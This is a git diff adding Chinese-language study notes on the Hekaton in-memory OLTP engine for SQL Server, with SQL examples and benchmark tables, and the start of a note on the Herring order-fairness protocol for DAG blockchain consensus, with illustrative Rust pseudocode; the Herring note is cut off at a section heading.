把存储过程**编译成本地机器代码**: + +- 生成的代码只包含实际需要的指令 +- 大量决策在编译时完成(数据类型已知、权限已验证) +- 整个查询计划被折叠成**单个函数**,用 goto 连接各个操作符 +- 避免函数调用开销 + +**类比:** 解释执行就像每个厨师读一本食谱(每一步都查书);原生编译就像把食谱翻译成厨师母语并背下来(执行时直接照着做)。 + +### 2.5 Bw-Tree(Bw-Tree) + +传统 B-Tree 索引在内存中使用时,每次修改都要加 latch 保护页面。Hekaton 使用 **Bw-Tree**——B-Tree 的无锁多版本变体。 + +Bw-Tree 的关键思想: + +- 每个节点都有版本号 +- 修改操作不是就地更新,而是创建新版本 +- 用 CAS(比较并交换)原子操作来更新指针 +- 删除用"墓碑"标记(tombstone),不真正删除 + +## 3 代码示例 + +### 3.1 创建内存优化表 + +```sql +-- 第一步:在数据库中添加文件组,用于存放内存优化数据 +ALTER DATABASE MyDB +ADD FILEGROUP HekatonFG CONTAINS MEMORY_OPTIMIZED_DATA; + +-- 第二步:添加文件到文件组 +ALTER DATABASE MyDB +ADD FILE (NAME = 'hekaton_data', FILENAME = 'D:\HekatonData') +TO FILEGROUP HekatonFG; + +-- 第三步:创建内存优化表(核心步骤) +CREATE TABLE Accounts ( + AccountId INT NOT NULL PRIMARY KEY NONCLUSTERED HASH + WITH (BUCKET_COUNT = 1000000), + CustomerName NVARCHAR(50) NOT NULL, + City NVARCHAR(50) NOT NULL, + Amount DECIMAL(18, 2) NOT NULL, + INDEX idx_City NONCLUSTERED (City) +) +WITH (MEMORY_OPTIMIZED = ON, + DURABILITY = SCHEMA_AND_DATA); +``` + +**关键细节:** +- `HASH` 索引需要指定 `BUCKET_COUNT`——哈希桶的数量。设太小会导致冲突,设太大会浪费内存。一个经验法则是设为预期行数的 1-2 倍。 +- `NONCLUSTERED` 表示这是非聚集索引(内存表中不支持聚集索引)。 +- `SCHEMA_AND_DATA` 表示数据持久化(持久化模式也可以是 `SCHEMA_ONLY`,用于临时表)。 + +### 3.2 编译存储过程 + +```sql +-- 创建一个编译到原生代码的存储过程 +-- 核心:添加 NATIVE_COMPILATION 和 SCHEMABINDING 两个选项 +CREATE PROCEDURE TransferMoney + @FromAccount INT, + @ToAccount INT, + @Amount DECIMAL(18, 2) +WITH NATIVE_COMPILATION, SCHEMABINDING, EXECUTE AS OWNER +AS +BEGIN ATOMIC + WITH ( + ISOLATION LEVEL = SERIALIZABLE, + LANGUAGE = N'English' + ) + -- 验证余额充足 + IF (SELECT Amount FROM dbo.Accounts + WHERE AccountId = @FromAccount) < @Amount + BEGIN + RAISERROR('余额不足', 16, 1); + RETURN; + END + + -- 转账:从源账户扣款 + UPDATE dbo.Accounts + SET Amount = Amount - @Amount + WHERE AccountId = @FromAccount; + + -- 转账:向目标账户加款 + UPDATE dbo.Accounts + SET Amount = Amount + @Amount + WHERE AccountId = @ToAccount; +END; +``` + +**关键细节:** +- `NATIVE_COMPILATION`:告诉 Hekaton 将此过程编译为原生机器代码。 +- `SCHEMABINDING`:绑定到底层表结构。这意味着只要存储过程存在,它引用的表就不能被删除。这样做的好处是执行时不需要获取模式锁(schema stability lock),进一步减少开销。 +- `BEGIN ATOMIC ... END`:定义了一个原子块,包含隔离级别。这是编译存储过程的强制要求。 +- 编译存储过程**不能引用常规表**(在当前实现中),只能操作内存优化表。 + +### 3.3 验证性能对比 + +```sql +-- 对比实验:同一个查询,分别对传统表和内存优化表执行 +-- 查询 100 万次随机查找并计算统计值 + +-- 对于传统表(使用解释器执行) +SET STATISTICS TIME ON; +DECLARE @i INT = 0, @total DECIMAL(18,2) = 0; +WHILE @i < 1000000 +BEGIN + SELECT @total = @total + Amount + FROM dbo.AccountsTraditional + WHERE AccountId = @i % 1000000; + SET @i += 1; +END; +SET STATISTICS TIME OFF; + +-- 对于内存优化表(使用编译存储过程执行) +-- 先创建一个批量查询的编译存储过程 +CREATE PROCEDURE BatchLookup + @Count INT +WITH NATIVE_COMPILATION, SCHEMABINDING +AS +BEGIN ATOMIC + WITH (ISOLATION LEVEL = SERIALIZABLE) + -- 使用循环在编译过程中处理 + ... +END; +``` + +论文实验结果(100,000 次查找,单核 2.67GHz Xeon): + +| 操作 | 传统 SQL Server | Hekaton | 加速比 | +|------|-----------------|---------|--------| +| 1 次查找 | 734K 周期 | 40K 周期 | 10.8X | +| 1000 次查找 | 20.1M 周期 | 1.06M 周期 | 18.9X | +| 10,000 次查找 | 201M 周期 | 9.85M 周期 | 20.4X | +| 1 次更新 | 910K 周期 | 45K 周期 | 20.2X | +| 100 次更新 | 8.17M 周期 | 260K 周期 | 31.4X | + +## 4 事务与并发控制 + +### 4.1 版本可见性 + +每条记录有两个时间戳: + +- **Begin**:创建此版本的交易的提交时间 +- **End**:删除此版本的交易的提交时间(或无穷大 `inf` 表示仍然有效) + +一个事务在逻辑读取时间 `RT` 下执行时,**只看见** `Begin <= RT <= End` 的版本。 + +``` +版本 A: Begin=10, End=20 → 在时间 15 可见 +版本 B: Begin=20, End=100 → 在时间 50 可见(版本 A 的更新) +版本 C: Begin=100, End=inf → 在时间 200 可见(版本 B 的更新) +``` + +### 4.2 提交时的验证(Validation) + +可串行化事务在提交时需要验证两件事: + +1. **读取稳定性**(Read Stability):事务读过的版本在提交时仍然可见(没有被其他事务更新)。 +2. **避免幻影**(Phantom Avoidance):事务扫描过的范围没有新增版本。 + +如果验证失败,事务回滚并重试。因为 Hekaton 没有锁,验证可以在缓存中进行,开销很低。 + +### 4.3 提交依赖(Commit Dependencies) + +当一个事务 T1 在验证期间读到另一个未提交事务 T2 创建或修改的版本时,T1 不能直接提交(因为 T2 可能回滚)。Hekaton 的解决方案: + +- T1 记录对 T2 的**提交依赖** +- T1 被允许继续执行,但结果暂不返回给客户端 +- 如果 T2 最终提交,T1 依赖计数减 1,可以提交 +- 如果 T2 回滚,T1 也必须回滚(级联回滚) + +这种方式保持了系统的**无阻塞性**。 + +## 5 持久化:日志和检查点 + +数据在内存中,宕机怎么办?Hekaton 用两种方式保证持久化: + +### 5.1 事务日志 + +- 每个事务的修改在**提交时**才写入日志(不是写前日志 WAL) +- 一条日志记录包含一个事务的所有修改 +- 只记录重做信息(redo),不记录撤销信息(undo) +- 索引操作不记日志——恢复时从数据重建索引 + +### 5.2 检查点 + +检查点是日志的**压缩表示**: + +- **数据文件**:包含特定时间范围内的所有插入版本 +- **增量文件**:记录哪些版本已被删除(用于过滤) +- 恢复时先加载数据文件,再用增量文件过滤已删除的版本 +- 当数据文件的"活跃内容"低于阈值时,合并相邻的数据文件 + +### 5.3 恢复过程 + +1. 从日志中找到最近的检查点 +2. **并行**加载所有数据/增量文件对 +3. 每对文件由一个独立线程处理(一个核对应一个线程) +4. 用检查点之后的日志尾部做增量恢复 + +恢复过程充分利用多核并行,这是 Hekaton 设计的核心思想之一。 + +## 6 垃圾回收(Garbage Collection) + +多版本意味着旧版本会堆积。Hekaton 需要回收那些对任何活跃事务都不可见的版本。 + +GC 的关键特性: + +| 特性 | 说明 | +|------|------| +| 非阻塞 | GC 与事务并发执行,不阻塞任何事务 | +| 协作式 | 事务线程在扫描时遇到垃圾版本,可以顺手清理 | +| 增量式 | 可以暂停/恢复,避免消耗过多 CPU | +| 并行化 | 所有工作线程参与 GC,按 CPU 核心分区 | + +GC 线程定期扫描全局事务映射,找到最老的活跃事务,所有被它之后删除的版本都可以安全回收。 + +## 7 架构总览 + +``` +┌──────────────────────────────────────────────────────┐ +│ SQL Server │ +│ ┌────────────┐ ┌───────────┐ ┌────────────────┐ │ +│ │ Metadata │ │ Query │ │ High Avail. │ │ +│ │ (常规目录) │ │ Optimizer │ │ (AlwaysOn) │ │ +│ └─────┬──────┘ └─────┬─────┘ └────────┬───────┘ │ +│ │ │ │ │ +│ ┌─────▼───────────────▼──────────────────▼───────┐ │ +│ │ Hekaton 引擎 │ │ +│ │ ┌────────────┐ ┌───────────┐ ┌─────────────┐ │ │ +│ │ │ 存储引擎 │ │ 编译器 │ │ 运行时 │ │ │ +│ │ │ (表/索引) │ │ (T-SQL→机器码) │ (集成库) │ │ │ +│ │ └─────┬──────┘ └───────────┘ └──────┬──────┘ │ │ +│ └────────┼──────────────────────────────┼─────────┘ │ +│ │ │ │ +│ ┌────────▼────────┐ ┌──────────▼───────┐ │ +│ │ 哈希索引 (无锁) │ │ Bw-Tree 索引 │ │ +│ │ + 范围索引 │ │ (无锁多版本 B-Tree)│ │ +│ └─────────────────┘ └──────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────┐ │ +│ │ 乐观 MVCC 并发控制 │ 无锁数据结构 │ 本机编译 │ │ +│ └──────────────────────────────────────────────┘ │ +└──────────────────────────────────────────────────────┘ + │ │ + ┌──────▼──────┐ ┌───────▼────────┐ + │ SQL Server │ │ FileStream │ + │ 事务日志 │ │ (检查点文件) │ + └─────────────┘ └────────────────┘ +``` + +## 8 为什么不做分区? + +同时期的很多内存数据库系统(H-store, VoltDB, HyPer)采用**数据分区**策略:把数据按核心分区,每个核心独占一个分区。 + +Hekaton 团队认真评估了分区方案后选择了**不做分区**。原因: + +- 如果负载本身不好分区(一个事务需要访问多个分区),性能急剧下降 +- 跨分区查询需要发送请求到其他核心并等待结果,开销远大于直接查共享哈希表 +- 不分区更稳健,能处理各种复杂的工作负载 + +## 9 性能实验总结 + +### 可扩展性(核心数 vs 吞吐量) + +在 12 核机器上的订单录入系统测试: + +| 引擎 | 2 核 | 12 核 | 扩展倍数 | +|------|------|-------|----------| +| 传统 SQL Server(有锁) | 984 TPS | 2,312 TPS | 2.3X | +| SQL Server(无锁分区) | 1,153 TPS | 5,834 TPS | 5.1X | +| Hekaton(InterOp) | 1,518 TPS | 7,709 TPS | 5.1X | +| Hekaton(原生编译) | 7,078 TPS | **36,375 TPS** | **5.1X** | + +关键发现:传统引擎的扩展性被 latch 争用限制在 2.3X。Hekaton 原生编译方案实现了 15.7X 的绝对性能提升,并且保持了完美的线性扩展。 + +## 10 一句话总结 + +**Hekaton 的核心思想就三件事:把所有东西放内存里、不用任何锁、把 SQL 编译成机器代码。** 这三件事叠加在一起,产生了 10-30 倍的性能提升和近乎线性的多核扩展性。 + +## 11 进一步阅读 + +- [Bw-Tree: A B-Tree for New Hardware Platforms](https://www.microsoft.com/en-us/research/publication/bw-tree-b-tree-new-hardware-platforms/) — Levandoski 等,ICDE 2013 +- [High-Performance Concurrency Control Mechanisms for Main-Memory Databases](https://www.microsoft.com/en-us/research/publication/high-performance-concurrency-control-mechanisms-for-main-memory-databases/) — Larson 等,PVLDB 2012 +- 微软已将该引擎正式命名为 **SQL Server In-Memory OLTP**,并集成到 SQL Server 2016 及更高版本中 diff --git a/src/content/docs/papers/hekaton.md b/src/content/docs/papers/hekaton.md new file mode 100644 index 000000000..10fd95628 --- /dev/null +++ b/src/content/docs/papers/hekaton.md @@ -0,0 +1,320 @@ +--- +title: Hekaton — SQL Server 内存优化 OLTP 引擎 +来源: 'Diaconu et al., "Hekaton: SQL Server''s Memory-Optimized OLTP Engine", SIGMOD 2013' +日期: 2026-06-13 +子分类: 存储与查询 +分类: 数据库 +provenance: pipeline-v3 +--- + +## 从日常类比开始:给收银台换一套「内存工作台」 + +想象一家连锁超市的收银系统。传统 SQL Server 像**带保险柜的柜台**:每笔交易都要打开抽屉(页锁)、在账本里找页码(B-tree 页 latch)、写完后还得把整页抄进保险柜(刷盘)。顾客一多,大家就在抽屉和页锁前排长队——CPU 核心越多,抢同一把锁的人反而越多,吞吐上不去。 + +Hekaton 的思路是:**在柜台旁边加一张内存工作台**。热数据(订单行、库存扣减、会员积分)直接放在工作台上,用 T-SQL 照常操作;冷数据(历史报表、归档)仍留在保险柜里。工作台不抢页锁、不靠分区把顾客赶到不同窗口——任何收银员(线程)都能直接摸到任意一行,靠**乐观多版本**解决「两人同时改同一商品」的冲突。 + +更狠的一步:针对只碰内存表的 stored procedure,SQL Server 把 T-SQL **编译成原生机器码**——相当于把「查价 → 扣库存 → 打小票」写成一条专用流水线,而不是每步都走通用解释器。 + +论文发表于 SIGMOD 2013,产品化后成为 SQL Server 2014 的 **In-Memory OLTP** 功能。Hekaton 不是独立数据库,而是嵌在 SQL Server 里的第二套存储/执行引擎。 + +--- + +## 是什么 + +**Hekaton**(希腊语「百手巨人」)是 Microsoft 为 **OLTP + 大内存 + 多核** 设计的内存数据库引擎,核心主张: + +1. **声明即用**:`CREATE TABLE ... MEMORY_OPTIMIZED`,无需换 DBMS。 +2. **混合访问**:单条 SQL / 单事务可同时读写 Hekaton 表与传统磁盘表。 +3. **原生编译**:只引用 Hekaton 表的 stored procedure 可编译为 C 再链接成 DLL,显著降低每请求指令数。 +4. **高并发**:性能关键路径上**无 latch、无锁表**;用 latch-free 索引 + 乐观 MVCC。 +5. **完整 ACID**:内存驻留但仍 durable——checkpoint + 日志,崩溃可恢复。 + +论文作者团队:Cristian Diaconu、Craig Freedman、Per-Åke Larson 等(Microsoft Research / SQL Server 组)。 + +--- + +## 为什么传统 SQL Server 不够 + +论文开篇做过「乐观上界」分析:即便把现有引擎的**扩展性**和 **CPI(每指令周期)** 都优化到极致,吞吐最多也就 **3–4×**;要 **10–100×** 必须换存储与执行模型。瓶颈来自: + +| 瓶颈 | 表现 | +|------|------| +| **Latch / spinlock** | B-tree 页、缓冲池热点;核数 >6 时 CPU 利用率卡在 ~40% | +| **锁管理器** | 行锁/页锁竞争、锁表本身成为共享状态 | +| **日志尾** | 高并发写时 transaction log 末尾串行 | +| **解释执行** | 通用 T-SQL 路径指令多、分支多 | + +Hekaton 的三板斧:**少指令**(原生编译)、**少等待**(latch-free + 无锁并发控制)、**数据在内存**(按行存储、索引为内存结构设计)。 + +设计还刻意**不做数据分区**来换扩展性——论文认为单机内存能放下时,不分区反而更快;扩展性靠无锁结构而非 sharding。 + +--- + +## 核心概念 + +### 1. 双引擎共存(Regular vs Hekaton) + +- **Regular 表**:传统页式存储、B-tree、buffer pool、WAL。 +- **Hekaton 表**:行存于内存;每表至少一个索引(**无堆表**);支持 **hash 索引**(点查)和 **Bw-tree 范围索引**(范围扫描)。 + +用户可渐进迁移:先改最热的一张表,再编译最热的一个 procedure,其余不动。 + +### 2. 行格式与嵌入式索引链 + +Hekaton 每行物理上三段: + +1. **用户列数据** +2. **索引链接列**:每个索引一列,把相同键的行串成链表(类似 Linux kernel 的 intrusive list)——更新索引时只改指针,不必像 B-tree 那样搬页 +3. **MVCC 头**:逻辑 begin/end timestamp(版本可见区间) + +读操作在索引链上扫描同键所有版本,只返回 begin ≤ 读时间戳 < end 的版本。 + +### 3. Latch-free 索引 + +Hash 与 Bw-tree 的实现保证多线程并发 insert/delete/lookup 时**不用 latch**。这与「无锁并发控制」不同: + +- **Latch**:保护物理结构(页、桶)——短临界区,可阻塞 +- **Lock**:保护逻辑事务隔离——Hekaton 在事务层不用传统锁表 + +### 4. 乐观多版本并发控制(O-MVCC) + +更新 = **删除旧版本 + 插入新版本**(copy-on-write 语义): + +- DELETE:先把 end timestamp 设为事务 ID(未提交),提交后改为 commit timestamp +- INSERT:begin timestamp 同样先写事务 ID,提交后定稿 +- 读可能依赖未提交版本 → 记录 **commit dependency**;依赖方 abort 会级联 + +隔离级别映射: + +| 提交前校验 | 隔离级别 | +|------------|----------| +| 不校验 phantom / read stability | Snapshot | +| 校验 read stability | Repeatable Read | +| 两者都校验 | Serializable | + +每个事务有 **read timestamp**(通常 = begin timestamp)和 **commit timestamp**;提交时验证 read set 仍有效,并按 scan set 重扫以防 phantom。 + +### 5. 原生编译(Native Compilation) + +流程:T-SQL → 查询优化器 → **MAT**(Mixed Abstract Syntax Tree,混合元数据/命令式/表达式/计划)→ **PIT**(Pure Imperative Tree)→ C 代码 → 编译链接进引擎。 + +关键优化: + +- 查询计划编译成**单个函数**,算子用 **label + goto** 串联,避免递归调用栈 +- 编译期类型已知 → 消除动态 dispatch +- 仅 Hekaton 表、固定 schema、单事务内的 procedure 可 natively compile;复杂算子(sort、部分内置函数)仍走解释路径 + +### 6. 持久化:无 WAL 页刷、有日志与 Checkpoint + +内存表不刷「数据页」,但仍 durable: + +- **Log stream**:每事务提交写**一条**记录(批量刷盘) +- **Checkpoint stream**:**data stream**(某逻辑时间段内所有 insert)+ **delta stream**(同段内 delete 的版本 ID) +- 索引操作**不记日志**——恢复时重建索引,把 bulk 成本挪到 recovery + +恢复时并行处理 data/delta 对。 + +### 7. 垃圾回收(GC) + +版本变垃圾当: + +1. 创建它的 transaction rollback;或 +2. 已被 delete,且所有活跃事务的 read timestamp 都晚于 delete 时间 + +- **Online GC**:索引扫描时顺手 unlink 垃圾版本(热路径自清理) +- **Offline GC**:后台线程周期性扫「冷角落」,与事务处理交错以免堆积 + +--- + +## 代码示例 + +### 示例 1:创建内存优化表与索引 + +SQL Server 2014+ 语法(论文思想的直接产品化;具体选项随版本略有差异): + +```sql +-- 需要先启用数据库级 In-Memory OLTP 文件组(略) +CREATE TABLE dbo.OrderLine ( + OrderId INT NOT NULL, + LineNo INT NOT NULL, + ProductId INT NOT NULL, + Qty INT NOT NULL, + UnitPrice DECIMAL(10,2) NOT NULL, + CONSTRAINT PK_OrderLine PRIMARY KEY NONCLUSTERED + HASH (OrderId, LineNo) WITH (BUCKET_COUNT = 1000000) +) WITH ( + MEMORY_OPTIMIZED = ON, + DURABILITY = SCHEMA_AND_DATA -- 或 SCHEMA_ONLY(无持久化,更快) +); + +-- 范围索引:按 ProductId 查某商品所有订单行 +CREATE NONCLUSTERED INDEX IX_OrderLine_Product + ON dbo.OrderLine (ProductId) + WITH (BUCKET_COUNT = 500000); +``` + +要点: + +- 必须有 **PRIMARY KEY**(hash 或 range) +- `BUCKET_COUNT` 影响 hash 冲突与内存;过小则链变长 +- `DURABILITY = SCHEMA_ONLY` 适合纯缓存型数据(论文中的非 durable 场景) + +### 示例 2:原生编译 Stored Procedure + +```sql +CREATE PROCEDURE dbo.PlaceOrder + @OrderId INT, + @ProductId INT, + @Qty INT, + @UnitPrice DECIMAL(10,2) +WITH NATIVE_COMPILATION, SCHEMABINDING, EXECUTE AS OWNER +AS +BEGIN ATOMIC WITH ( + TRANSACTION ISOLATION LEVEL = SNAPSHOT, + LANGUAGE = N'us_english' +) + DECLARE @LineNo INT; + + SELECT @LineNo = ISNULL(MAX(LineNo), 0) + 1 + FROM dbo.OrderLine + WHERE OrderId = @OrderId; + + INSERT INTO dbo.OrderLine (OrderId, LineNo, ProductId, Qty, UnitPrice) + VALUES (@OrderId, @LineNo, @ProductId, @Qty, @UnitPrice); +END; +GO +``` + +约束(与论文一致): + +- `NATIVE_COMPILATION` + `SCHEMABINDING` + `BEGIN ATOMIC`:整个 procedure 在一个编译单元、单事务内 +- 只能访问 **memory-optimized 表**;引用磁盘表则退化为 interpreted interop +- 隔离级别在 procedure 头声明;编译器针对 snapshot 等路径生成专用代码 + +### 示例 3:混合事务(Hekaton + Regular) + +Interop 是论文强调的产品优势——迁移不必一步到位: + +```sql +BEGIN TRAN; + + -- 内存表:高频订单行 + UPDATE dbo.OrderLine WITH (SNAPSHOT) + SET Qty = Qty - 1 + WHERE OrderId = @OrderId AND ProductId = @ProductId; + + -- 磁盘表:审计日志(低频、可归档) + INSERT INTO dbo.AuditLog (EventTime, OrderId, Action) + VALUES (SYSUTCDATETIME(), @OrderId, N'decrement'); + +COMMIT; +``` + +Hekaton 路径走 O-MVCC;磁盘表仍走传统锁与 WAL——优化器/事务协调器负责统一 commit。 + +--- + +## 架构一图 + +```text + ┌─────────────────────────────────┐ + │ T-SQL / ODBC │ + └───────────────┬─────────────────┘ + │ + ┌─────────────────────┼─────────────────────┐ + ▼ ▼ ▼ + ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ + │ Interpreted │ │ Native Compiled│ │ Regular Engine│ + │ (interop) │ │ Procedures │ │ (disk tables) │ + └────────┬───────┘ └────────┬───────┘ └────────┬───────┘ + │ │ │ + └──────────┬─────────┘ │ + ▼ │ + ┌──────────────────────┐ │ + │ Hekaton Engine │◄── cross-engine ─┘ + │ latch-free indexes │ transactions + │ O-MVCC + row store │ + └──────────┬───────────┘ + │ + ┌───────────────┼───────────────┐ + ▼ ▼ ▼ + ┌──────────┐ ┌──────────┐ ┌──────────┐ + │ In-mem │ │ Log / │ │ Checkpoint│ + │ indexes │ │ durable │ │ streams │ + └──────────┘ └──────────┘ └──────────┘ +``` + +--- + +## 实验结果(论文 §9 摘要) + +测试环境:Xeon X5650,最高 12 核;表约 6 列 × 2000 万行。 + +### CPU 效率(RandomLookups / RandomUpdates) + +| 场景 | 相对传统引擎 | +|------|----------------| +| 每次 10+ 次点查 | ~**20×** 更少 CPU cycles(约 5% cycles) | +| 单次点查 | ~10.8× | +| 每次 100+ 行更新 | ~**30×** | +| 绝对吞吐 | 单核 ~270 万次 lookup/s;~190 万次 update/s(写缓存开启测 CPU,非磁盘延迟) | + +Hekaton 日志量在该更新基准上比 regular 少约 **57%**(行级、无页镜像)。 + +### 扩展性(高争用 OLTP 模拟) + +| 配置 | 12 核吞吐 (txn/s) | 相对 regular | +|------|-------------------|--------------| +| Regular SQL Server | ~2,312 | 1×(2→12 核仅 2.3×) | +| Hekaton interop | ~7,709 | ~3.3× | +| Hekaton + native compile | ~**36,375** | ~**15.7×** | + +Hekaton 在 2→12 核上约 **5.1×** 线性扩展;regular 受 latch 限制明显。 + +--- + +## 与后续技术的关系 + +| 论文概念 | 后续影响 | +|----------|----------| +| 嵌入式双引擎 | SQL Server 2014 **In-Memory OLTP** | +| Bw-tree | 微软后续多篇 Bw-tree 论文;影响 main-memory 索引设计 | +| 原生编译 T-SQL | 限制较多但成为「极致 OLTP」卖点 | +| 无分区扩展 | 与 NewSQL 分片路线对比;Hekaton 主打** scale-up** | +| O-MVCC + 无锁结构 | 与 Silo、LMDB 等内存 OLTP 设计同代;商业产品少见地完整落地 | + +读 Hekaton 有助于理解:**为什么「内存数据库」在 2010 年代必须重新做索引和并发控制,而不是只把 buffer pool 变大**。 + +--- + +## 局限与论文未覆盖点 + +- **容量**:受单机内存限制;超大 working set 仍需 regular 表或分库。 +- **Native procedure 约束**:schema 固定、算子子集、单事务——复杂 ETL 仍用 interpreted。 +- **索引重建恢复**:缩短日志但拉长 recovery;适合 OLTP 短恢复窗口假设。 +- **2013 年后硬件**:NVMe、持久内存、RDMA 等未在本文讨论。 + +--- + +## 自检清单(零基础读完应能回答) + +1. Hekaton 与「单独买一个内存数据库」相比,集成进 SQL Server 的四个产品级好处是什么? +2. **Latch-free** 与 **lock-free 事务(无锁表)** 分别解决哪类竞争? +3. 为什么 UPDATE 在 Hekaton 里是 delete + insert?对索引链表有什么影响? +4. 原生编译为什么用 goto 串计划而不是函数调用树? +5. 若只把表改成 `MEMORY_OPTIMIZED` 但不编译 procedure,论文实验里大约能拿到多少倍吞吐提升? + +--- + +## 延伸阅读 + +- 同会议 / 同期:Bw-tree 原始论文(Levandoski et al.) +- 对比阅读:Silo(MIT,decomposition of OLTP)、H-Store / VoltDB 分区 OLTP +- 产品文档:Microsoft Docs — In-Memory OLTP (Memory-Optimized Tables) +- 论文 PDF:[ACM DOI 10.1145/2463676.2463710](https://doi.org/10.1145/2463676.2463710) + +--- + +## 一句话总结 + +**Hekaton 把 OLTP 热路径搬进内存、去掉 latch 与传统锁、用乐观 MVCC 保隔离,并把 T-SQL 编译成机器码——在不换 DBMS 的前提下,让 SQL Server 在 multicore 上从「抢锁排队」变成「多收银员共用一个无抽屉锁的工作台」。** diff --git a/src/content/docs/papers/herring-parallel-batch-order-fairness-on-dag-based-blockchain-consensus-arxiv-26.md b/src/content/docs/papers/herring-parallel-batch-order-fairness-on-dag-based-blockchain-consensus-arxiv-26.md new file mode 100644 index 000000000..f8636c225 --- /dev/null +++ b/src/content/docs/papers/herring-parallel-batch-order-fairness-on-dag-based-blockchain-consensus-arxiv-26.md @@ -0,0 +1,220 @@ +--- +title: "Herring:并行批量顺序公平性——在 DAG 区块链共识中对抗 MEV" +来源: https://arxiv.org/abs/2605.23648 +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +# Herring:并行批量顺序公平性——在 DAG 区块链共识中对抗 MEV + +## 一、为什么要关心这件事?——排队打车的故事 + +想象你在一座大城市打网约车。每当你发出叫车请求,平台会收集成千上万个请求,然后决定"谁先被接单"。问题在于,控制这个排序的人可以从中牟利: + +- 看到你有急事,故意把你的请求排在后面,然后让加价的人先接单 +- 发现某只股票的买卖请求,抢先用自己的资金买入(这叫 front-running) + +在加密货币世界,这种现象叫 **MEV(Maximal Extractable Value,最大可提取价值)**。据统计,每年因交易排序被操纵而损失的金额高达数十亿美元。 + +**核心问题:** 区块链节点(称为"验证者")虽然对"哪些交易有效"达成共识,但对"交易的顺序"几乎完全自由。Herring 这篇论文要解决的就是——**让交易的排序尽可能公平,不让任何人操控**。 + +## 二、传统方案 vs DAG 方案:图书馆借书类比 + +### 传统 BFT 共识(单线排队) + +传统的区块链共识(如 PBFT、HotStuff)像是一个**单窗口排队系统**: + +1. 每个时刻只有一个" leader(领导者)"负责决定交易顺序 +2. 所有交易必须排成一条线 +3. 领导者可以随意排列——这就是漏洞所在 + +### DAG 共识(多人同时处理) + +DAG(有向无环图)共识像是一个**多人同时工作的图书馆**: + +1. 有多个"管理员"(验证者)可以同时处理交易 +2. 管理员之间互相引用对方处理过的内容,形成一张网 +3. 效率更高,但顺序公平性更难保证 + +### 三种公平性方案的对比 + +| 方案 | 怎么决定顺序 | 缺点 | +|------|------------|------| +| Themis | 单个领导者决定 | 单点瓶颈,领导者可作恶 | +| FairDAG | 所有管理员串行计算 | 多核 CPU 没法并行利用 | +| DoD | 在共识前计算 | 阻塞共识 Pipeline | +| **Herring** | **并行计算 + 共识后处理** | **无** | + +## 三、核心概念拆解 + +### 3.1 γ-Batch-Order-Fairness(γ-批量顺序公平性) + +这是论文要保障的核心属性。翻译成人话: + +> 如果大部分节点(γ 比例的验证者)都先收到交易 A 再收到交易 B,那么最终输出时 A 必须排在 B 前面(或同一批)。 + +但有一个根本障碍叫 **Condorcet 悖论**(投票循环): + +假设有三个交易 a、b、c,三个节点收到顺序分别是: +- 节点1: a → b → c +- 节点2: b → c → a +- 节点3: c → a → b + +于是出现了:多数认为 a 在 b 前,b 在 c 前,c 在 a 前——**一个无法打破的循环**。 + +Herring 的解法:把循环内的交易归入"同一批次",批次内顺序无所谓,只保证批次之间的先后。 + +### 3.2 依赖图(Dependency Graph) + +Herring 用一张有向图来记录"谁应该排在谁前面": + +- 每个交易是图上的一个点 +- 如果多数节点先收到 tx_A 再收到 tx_B,就连一条 A→B 的箭头 +- 当所有点对之间都有箭头时,排序就确定了 + +交易被分为三类(按收到的证据数量): + +``` +Solid(实心):至少 n-2f 个节点确认收到 +Shaded(着色):至少阈值个节点确认,但不到 n-2f +Blank(空白):证据不足,暂时忽略 +``` + +### 3.3 关键创新:并行化 + 共识后处理 + +这是 Herring 最核心的设计。论文发现 FairDAG 的性能瓶颈在于**构建依赖图的阶段完全串行执行**——即使有 64 核 CPU,也只能用 1 核。 + +Herring 的做法分两步: + +**(1)共识后构建图(Post-consensus Graph Construction)** + +不在共识的"关键路径"上做公平性计算。等共识层先把一批批交易确定下来(commit subdag),然后再离线构建依赖图。这样公平性工作不会拖慢共识本身。 + +**(2)并行构建子图** + +每个已确认的子 DAG(subdag)可以独立构建自己的依赖图,多个线程同时工作: + +```rust +// 伪代码:Herring 的并行图构建 +fn build_dependency_graph_parallel(subdags: &[SubDag]) -> DependencyGraph { + let mut threads = Vec::new(); + + // 每个子 DAG 用一个独立线程处理 + for subdag in subdags { + let handle = thread::spawn(move || { + // 这个子 DAG 内部的图构建是串行的 + let local_graph = build_local_ordering(subdag); + let weight_matrix = compute_pairwise_weights(local_graph); + let edges = topological_sort(weight_matrix); + (subdag.id, edges) + }); + threads.push(handle); + } + + // 等所有线程完成,合并结果 + let mut merged_graph = DependencyGraph::new(); + for handle in threads { + let (subdag_id, edges) = handle.join().unwrap(); + merged_graph.merge(subdag_id, edges); + } + + // 小量同步点:处理跨子 DAG 的边 + merged_graph.resolve_missing_edges(); + merged_graph +} +``` + +### 3.4 显式缺失边解析(Explicit Missing Edge Resolution) + +当两个交易之间还没有足够的证据来决定先后顺序时,它们的边就是"缺失"的。 + +FairDAG 用的是**隐式解析**——等新证据慢慢通过后续子 DAG 渗入,所有线程都得停下来等——这又回到了串行瓶颈。 + +Herring 用的是**显式解析**——通过 Narwhal 的可靠广播层,专门发送 FairUpdate 投票来补齐缺失边: + +```rust +// 伪代码:显式缺失边解析 +struct FairUpdate { + /// 投票发起者的 ID + source_id: ValidatorId, + /// 当前轮次 + round: RoundNumber, + /// 缺失对的列表:tx_A 在 tx_B 之前 + missing_pairs: Vec<(TransactionId, TransactionId)>, + /// 签名证明这确实是该验证者发的 + signature: Signature, +} + +// 每个工作线程发送自己的 FairUpdate +fn send_fair_update(&self, missing_pairs: Vec<(TxId, TxId)>) { + let update = FairUpdate { + source_id: self.id, + round: self.current_round, + missing_pairs, + signature: self.sign(&update), + }; + // 附着到 outgoing batch 上,通过 Narwhal 可靠广播 + self.worker.broadcast_batch(update.into()); +} + +// 收集投票直到达到阈值 +fn resolve_missing_edges(&self, edges: &mut Vec) { + for pair in missing_pairs(&edges) { + let votes = self.collect_votes(pair); + if votes >= threshold(&self.validators) { + // 投票够了,确定方向 + let direction = if votes > half(votes) { + EdgeDirection::Forward + } else { + EdgeDirection::Backward + }; + edges.insert_directed_edge(pair.tx_a, pair.tx_b, direction); + } + } +} +``` + +### 3.5 活体攻击(Liveness Attacks)的发现 + +Herring 的论文还做了另一件有价值的事:**发现了 FairDAG-RL 和 DoD 中都存在的漏洞**。 + 